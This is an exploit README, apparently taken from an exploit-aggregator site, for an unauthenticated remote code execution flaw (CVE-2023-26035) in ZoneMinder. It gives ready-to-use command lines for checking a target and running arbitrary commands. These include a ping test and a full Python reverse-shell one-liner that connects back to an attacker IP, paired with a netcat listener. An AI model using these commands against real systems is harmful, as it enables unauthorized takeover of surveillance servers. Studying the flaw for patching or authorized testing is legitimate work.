## https://sploitus.com/exploit?id=2BF189F3-8F76-5543-B4CD-591DC1EEDDD4
# Exploit - ZoneMinder CVE-2023-26035
There is a **Unauthenticated Remote Code Execution (RCE)** affecting **ZoneMinder** Snapshots.
This is an **exploit** for CVE-2023-26035.
## Affected versions
ZoneMinder **< 1.36.33** and
ZoneMinder **< 1.37.33**.
![Usage of the exploit](./demo.png)
## Usage
#### Check if the target is vulnerable:
python3 zoneminder.py http://target
#### Execute a command
python3 zoneminder.py http://target command
## Examples
#### Test command execution with `ping`
Run `tcpdump` on the interface connected to the target (here `tun0`) and filter for `ICMP` packets:
sudo tcpdump -i tun0 icmp
Then execute a ping to your IP. Make sure to use quotes `"` as otherwise the command won't be interpreted correctly.
python3 zoneminder.py http://target "ping -C 4 your_ip"
#### Reverse shell
Create the listener with netcat:
nc -lvnp 1337
Use a reverse shell oneliner:
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"
More at https://revshells.com.
## Requirements
The exploit make use of **`requests`** and **`BeautifulSoup`**.
Install it with :
python3 -m pip install requests beautifulsoup4
## Acknowledgements
I just wanted a standalone exploit that didn't require Metasploit.
The script is derived of https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr